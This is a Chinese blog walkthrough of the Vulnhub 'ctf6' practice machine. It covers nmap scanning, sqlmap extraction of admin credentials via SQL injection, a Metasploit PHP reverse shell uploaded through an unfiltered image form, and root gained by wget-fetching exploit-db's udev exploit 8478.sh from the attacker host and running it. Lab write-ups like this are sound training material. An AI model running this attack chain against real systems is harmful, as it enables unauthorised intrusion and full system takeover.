ctf6 vulnhub靶场

最新推荐文章于 2023-12-23 11:44:07 发布

川川小宝

最新推荐文章于 2023-12-23 11:44:07 发布

阅读量285

点赞数

分类专栏： Vulnhub 文章标签：安全 linux 网络

本文链接：https://blog.csdn.net/weixin_62621015/article/details/129337387

版权

Vulnhub 专栏收录该内容

25 篇文章 3 订阅

订阅专栏

文章描述了一位安全研究员通过nmap进行端口扫描，发现80端口并利用SQL注入漏洞进行渗透测试。使用sqlmap工具获取数据库信息，然后上传php反弹shell，并通过寻找路径访问执行。在Linux环境中，利用udev漏洞实现权限提升，最终获得系统完全访问权限。

摘要由CSDN通过智能技术生成

ctf6 靶机

主机发现，端口扫描

nmap -sP 192.168.181.0/24   
nmap -p 1-65535 -A 192.168.181.15

在这里插入图片描述

访问80端口

在这里插入图片描述

随便点点，发现了这个read more

在这里插入图片描述

点进去，看这个url，是不是很激动 😃，是不是有一种sql注入漏洞的感觉！

192.168.181.152/?id=4

在这里插入图片描述

加个’看看，确实有点变化，直接sqlmap吧

在这里插入图片描述

加个cookie注入

sqlmap -u "192.168.181.152/?id=1" --level=5 --risk=3  --cookie="PHPSESSID=a1r7glj0cfj052q23kos3fb746"

在这里插入图片描述

sqlmap -u "192.168.181.152/?id=1" --level=5 --risk=3 
--cookie="PHPSESSID=a1r7glj0cfj052q23kos3fb746"  --dbs

在这里插入图片描述

sqlmap -u "192.168.181.152/?id=1" --level=5 --risk=3  --cookie="PHPSESSID=a1r7glj0cfj052q23kos3fb746"  --current-db

在这里插入图片描述

sqlmap -u "192.168.181.152/?id=1" --level=5 --risk=3  --cookie="PHPSESSID=a1r7glj0cfj052q23kos3fb746"  -D cms --tables

在这里插入图片描述

sqlmap -u "192.168.181.152/?id=1" --level=5 --risk=3  --cookie="PHPSESSID=a1r7glj0cfj052q23kos3fb746"  -D cms -T user --columns

在这里插入图片描述

sqlmap -u "192.168.181.152/?id=1" --level=5 --risk=3  --cookie="PHPSESSID=a1r7glj0cfj052q23kos3fb746"  -D cms -T user -C user_password,user_use
rname --dump

在这里插入图片描述

admin adminpass

轻轻松松 😃

登陆试试

在这里插入图片描述

登陆成功

在这里插入图片描述

不知道为啥火狐浏览器登录完什么变化都没有

在这里插入图片描述

很疑惑，所以我用dirb扫了一下目录，这几个可能有用，访问一下

在这里插入图片描述

访问files，存放图片的目录；随便点开一个看看,就是别的文章里面的图片

在这里插入图片描述

访问actions

在这里插入图片描述

刚刚那个登陆界面就是action目录下的文件login

在这里插入图片描述

可以当我想包括其他文件的时候，却没有反应，还是一开始的index.php画面

在这里插入图片描述

太奇怪了 😦

再看看别的目录吧

这里发现了一个压缩包，看名字有点像代码的备份文件，下载下来瞧瞧

在这里插入图片描述

刚刚登录完一直返回index，那就先看看index.php

在这里插入图片描述

看，我刚刚猜的没错，当action=后面是可以包含其他文件的，我们登录成功了就会更新index.php的画面

在这里插入图片描述

不知道为啥，我试了很多次登录成功后都没有正常跳转界面，难道是浏览器问题？

试试换个浏览器，居然就有了，搞不懂 =_=

在这里插入图片描述

那就在这继续吧

有个可以上传文件的地方，但是看上去只能传图片，还是先试试能不能直接传php反弹shell文件

在这里插入图片描述

在msf生成一个反弹shell，弄成php文件传上去试试

在这里插入图片描述

似乎完全没有过滤，直接就传上去了

为了方便寻找我给写了个名字aaa

在这里插入图片描述

打开msf监听

在这里插入图片描述

现在问题是，怎么访问我们刚刚传上去的php呢？

访问这个界面没有反应，因为我们的代码不是上传到这的，是在这个image里面，但页面没法直接解析。

我们需要找找这个image的路径直接访问

在这里插入图片描述

别忘了一开始发现的存放图片的目录，我们的反弹shell就放在这

在这里插入图片描述

点击访问，反弹shell就执行成功了

在这里插入图片描述

打开shell，弄个回显

在这里插入图片描述

想看看home目录下的文件，但没有权限

在这里插入图片描述

sudo -l 没有密码

find提权也没发现有用的

在这里插入图片描述

只能看看本机的版本环境有没有漏洞了

在这里插入图片描述

linux 2.6.18-92

searchsploit linux 2.6

有好多，试试这个先

udev漏洞，针对linux 2.6版本，刚好符合，而且可以直接使用sh文件提权，不妨一试

在这里插入图片描述

查看一下使用方法

cat /usr/share/exploitdb/exploits/linux/local/8478.sh

在这里插入图片描述

复制下来

cp /usr/share/exploitdb/exploits/linux/local/8478.sh  /home/user

在这里插入图片描述

开启http服务

python -m http.server 8888

在这里插入图片描述

跳转到tmp目录

cd /tmp
wget http://192.168.181.129/8478.sh

在这里插入图片描述

也可以在meterpreter命令行使用命令上传

upload /home/user/8478.sh /tmp

在这里插入图片描述

给8478.sh添加执行权限

chmod +x 8478.sh

在这里插入图片描述

根据提示查看

在这里插入图片描述
也可以查看进程
虽然不知道查出来的为什么不太一样
**在这里插入图片描述**

./8478.sh 568

提示说，多运行几遍就好了

确实，运行了五六七八遍就好了

提权成功

在这里插入图片描述

可以为所欲为了

在这里插入图片描述

o了 😃

川川小宝

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
ctf6 vulnhub靶场

ctf6 vulnhub靶场个人通关记录
复制链接

扫一扫

专栏目录